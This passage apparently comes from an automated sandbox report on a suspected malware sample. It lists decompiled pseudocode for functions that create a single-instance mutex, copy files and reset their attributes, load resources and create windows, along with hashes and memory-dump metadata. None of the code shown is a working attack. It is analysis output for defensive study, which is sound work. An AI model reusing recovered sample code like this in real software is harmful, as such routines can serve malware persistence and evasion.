				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x49befc;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x49e668; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0045843C(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                                                                                                                                                                                            0x00458388
                                                                                                                                                                                                                            0x00458396
                                                                                                                                                                                                                            0x00458399
                                                                                                                                                                                                                            0x0045839e
                                                                                                                                                                                                                            0x004583a3
                                                                                                                                                                                                                            0x004583a6
                                                                                                                                                                                                                            0x004583b0
                                                                                                                                                                                                                            0x004583ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583c0
                                                                                                                                                                                                                            0x004583cb
                                                                                                                                                                                                                            0x004583d0
                                                                                                                                                                                                                            0x004583d1
                                                                                                                                                                                                                            0x004583d4
                                                                                                                                                                                                                            0x004583dd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3238433803-0
                                                                                                                                                                                                                            • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409A90 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A90(void* __eax, long __edx) {
				int _t4;
				long _t7;

				_t7 = 0;
				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
				if(_t4 == 0) {
					_t7 = GetLastError();
				}
				return _t7;
			}





                                                                                                                                                                                                                            0x00409a97
                                                                                                                                                                                                                            0x00409aa2
                                                                                                                                                                                                                            0x00409aa9
                                                                                                                                                                                                                            0x00409ab0
                                                                                                                                                                                                                            0x00409ab0
                                                                                                                                                                                                                            0x00409ab7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AA2
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1799206407-0
                                                                                                                                                                                                                            • Opcode ID: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                                                                                                                                                                                            • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047423C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				intOrPtr _t25;
				void* _t27;
				void* _t30;

				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t30);
				_push(0x4742ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t30 + 0xfffffff8;
				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
				_t27 = _t13;
				if(GetLastError() != 0xb7) {
					if(_t27 != 0 && _v9 == 0) {
						CloseHandle(_t27);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x4742b3);
				return E004049C0( &_v8);
			}









                                                                                                                                                                                                                            0x00474244
                                                                                                                                                                                                                            0x00474247
                                                                                                                                                                                                                            0x0047424d
                                                                                                                                                                                                                            0x00474254
                                                                                                                                                                                                                            0x00474255
                                                                                                                                                                                                                            0x0047425a
                                                                                                                                                                                                                            0x0047425d
                                                                                                                                                                                                                            0x0047426f
                                                                                                                                                                                                                            0x00474274
                                                                                                                                                                                                                            0x00474280
                                                                                                                                                                                                                            0x00474288
                                                                                                                                                                                                                            0x00474291
                                                                                                                                                                                                                            0x00474291
                                                                                                                                                                                                                            0x00474288
                                                                                                                                                                                                                            0x00474298
                                                                                                                                                                                                                            0x0047429b
                                                                                                                                                                                                                            0x0047429e
                                                                                                                                                                                                                            0x004742ab

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4294037311-0
                                                                                                                                                                                                                            • Opcode ID: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                                                                                                                                                                                            • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473804 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _t51;
				void* _t56;
				void* _t59;
				void* _t61;

				_t61 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t56 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t59);
				_push(0x4738af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t59 + 0xfffffff0;
				if(E00409A48(_v12, _t61) != 0) {
					E00404BB8( &_v16, E00404E80(_v12));
					E00409A90(_v16, 0x80);
				}
				_t44 = E00404E80(_v12);
				CopyFileA(E00404E80(_v8), _t25, 0); // executed
				E00404BB8( &_v20, _t44);
				E00409A90(_v20, _t56);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(0x4738b6);
				return E004049E4( &_v20, 4);
			}











                                                                                                                                                                                                                            0x00473804
                                                                                                                                                                                                                            0x0047380e
                                                                                                                                                                                                                            0x00473811
                                                                                                                                                                                                                            0x00473814
                                                                                                                                                                                                                            0x00473816
                                                                                                                                                                                                                            0x00473819
                                                                                                                                                                                                                            0x0047381f
                                                                                                                                                                                                                            0x00473827
                                                                                                                                                                                                                            0x0047382e
                                                                                                                                                                                                                            0x0047382f
                                                                                                                                                                                                                            0x00473834
                                                                                                                                                                                                                            0x00473837
                                                                                                                                                                                                                            0x00473844
                                                                                                                                                                                                                            0x00473853
                                                                                                                                                                                                                            0x00473860
                                                                                                                                                                                                                            0x00473860
                                                                                                                                                                                                                            0x0047386f
                                                                                                                                                                                                                            0x0047387b
                                                                                                                                                                                                                            0x00473885
                                                                                                                                                                                                                            0x0047388f
                                                                                                                                                                                                                            0x00473896
                                                                                                                                                                                                                            0x00473899
                                                                                                                                                                                                                            0x0047389c
                                                                                                                                                                                                                            0x004738ae

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CopyFileA.KERNEL32 ref: 0047387B
                                                                                                                                                                                                                              • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AA2
                                                                                                                                                                                                                              • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AttributesCopyErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2414470624-0
                                                                                                                                                                                                                            • Opcode ID: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                                                                                                                                                                                            • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0041A81C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x49e668; // 0x400000
				}
				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x41a890);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E0041A897);
					return E00403BEC(_v8);
				}
			}


















                                                                                                                                                                                                                            0x0041a81d
                                                                                                                                                                                                                            0x0041a81f
                                                                                                                                                                                                                            0x0041a823
                                                                                                                                                                                                                            0x0041a825
                                                                                                                                                                                                                            0x0041a827
                                                                                                                                                                                                                            0x0041a82b
                                                                                                                                                                                                                            0x0041a82d
                                                                                                                                                                                                                            0x0041a82d
                                                                                                                                                                                                                            0x0041a845
                                                                                                                                                                                                                            0x0041a848
                                                                                                                                                                                                                            0x0041a84a
                                                                                                                                                                                                                            0x0041a89e
                                                                                                                                                                                                                            0x0041a84c
                                                                                                                                                                                                                            0x0041a85d
                                                                                                                                                                                                                            0x0041a862
                                                                                                                                                                                                                            0x0041a863
                                                                                                                                                                                                                            0x0041a868
                                                                                                                                                                                                                            0x0041a86b
                                                                                                                                                                                                                            0x0041a873
                                                                                                                                                                                                                            0x0041a878
                                                                                                                                                                                                                            0x0041a87c
                                                                                                                                                                                                                            0x0041a87f
                                                                                                                                                                                                                            0x0041a882
                                                                                                                                                                                                                            0x0041a88f
                                                                                                                                                                                                                            0x0041a88f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            • Opcode ID: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                                                                                                                                                                                            • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407A8A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E00407A8A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t31;
				long _t38;

				_push(_t31);
				_v8 = _t31;
				_t38 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                                                                                                                                                                                            0x00407a8f
                                                                                                                                                                                                                            0x00407a93
                                                                                                                                                                                                                            0x00407a98
                                                                                                                                                                                                                            0x00407a9a
                                                                                                                                                                                                                            0x00407acb
                                                                                                                                                                                                                            0x00407ad4
                                                                                                                                                                                                                            0x00407ae0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                                                                                                                                                                                            • Instruction ID: a8a80a8af59d526015255caeaaeb12d1c6418dce9794d9929da9e8c0ec6d85c8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A28C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0045A28C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t40;
				char _t41;

				_push(0);
				_t37 = __edx;
				_t27 = __eax;
				_push(_t40);
				_push(0x45a30e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40;
				_t41 =  *((char*)(__eax + 0xa4));
				if(_t41 == 0) {
					_t7 = _t27 + 0x8c; // 0x8c
					E00404A14(_t7, __edx);
				} else {
					E0045A240(__eax,  &_v8);
					E00404DCC(_v8, _t37);
					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
						SetWindowTextA( *(_t27 + 0x30), E00404E80(_t37));
						_t6 = _t27 + 0x8c; // 0x8c
						E004049C0(_t6);
					}
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0045A315);
				return E004049C0( &_v8);
			}








                                                                                                                                                                                                                            0x0045a28f
                                                                                                                                                                                                                            0x0045a293
                                                                                                                                                                                                                            0x0045a295
                                                                                                                                                                                                                            0x0045a299
                                                                                                                                                                                                                            0x0045a29a
                                                                                                                                                                                                                            0x0045a29f
                                                                                                                                                                                                                            0x0045a2a2
                                                                                                                                                                                                                            0x0045a2a5
                                                                                                                                                                                                                            0x0045a2ac
                                                                                                                                                                                                                            0x0045a2eb
                                                                                                                                                                                                                            0x0045a2f3
                                                                                                                                                                                                                            0x0045a2ae
                                                                                                                                                                                                                            0x0045a2b3
                                                                                                                                                                                                                            0x0045a2bd
                                                                                                                                                                                                                            0x0045a2c2
                                                                                                                                                                                                                            0x0045a2d9
                                                                                                                                                                                                                            0x0045a2de
                                                                                                                                                                                                                            0x0045a2e4
                                                                                                                                                                                                                            0x0045a2e4
                                                                                                                                                                                                                            0x0045a2c2
                                                                                                                                                                                                                            0x0045a2fa
                                                                                                                                                                                                                            0x0045a2fd
                                                                                                                                                                                                                            0x0045a300
                                                                                                                                                                                                                            0x0045a30d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0045A240: GetWindowTextA.USER32 ref: 0045A263
                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 0045A2D9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                                            • Opcode ID: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                                                                                                                                                                                            • Instruction ID: 29e0112d14c0054e859a686d8a752fc0bc116d16f21071392ac3c9ea7363cd22
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001D4B06006049BD701EB65C842B5A72A8AB88704F5042B7FD0497383D63C9D59866E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407A8C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                                                                                                                                                                                            0x00407a93
                                                                                                                                                                                                                            0x00407a98
                                                                                                                                                                                                                            0x00407a9a
                                                                                                                                                                                                                            0x00407acb
                                                                                                                                                                                                                            0x00407ad4
                                                                                                                                                                                                                            0x00407ae0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407AE4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402C0C();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t12);
				return _t22;
			}








                                                                                                                                                                                                                            0x00407aeb
                                                                                                                                                                                                                            0x00407af0
                                                                                                                                                                                                                            0x00407af2
                                                                                                                                                                                                                            0x00407b21
                                                                                                                                                                                                                            0x00407b2a
                                                                                                                                                                                                                            0x00407b36

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
